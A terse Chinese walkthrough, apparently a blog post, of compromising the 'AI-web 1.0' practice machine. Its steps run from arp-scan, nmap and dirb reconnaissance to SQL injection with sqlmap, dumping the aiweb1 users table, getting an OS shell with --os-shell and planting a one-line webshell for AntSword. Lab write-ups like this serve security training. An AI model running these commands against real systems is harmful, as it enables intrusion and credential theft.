C段扫描
arp-scan -l
端口扫描
nmap ip地址 -sV -v -T4
使用dirb对网页进一步扫描
dir url
访问robots.txt
使用dirb 对两个目录分别进行扫描
dir url
发现info.php进行访问
扫描se3reTdir777
发现index.php页面,进行访问
考虑sql注入
burp抓包
sqlmap扫描列出数据库
sqlmap url --dbs
sqlmap url -D aiweb1 --tables
列出表名
sqlmap url -D aiweb1 -T users --columns
列出字段名
获取数据
sqlmap url -D aiweb1 -T users --dump
sqlmap url --os-shell
–os-shell获取shell
写入一句话木马
使用蚁剑进行连接
AI-web 1.0靶机
最新推荐文章于 2024-08-01 23:44:38 发布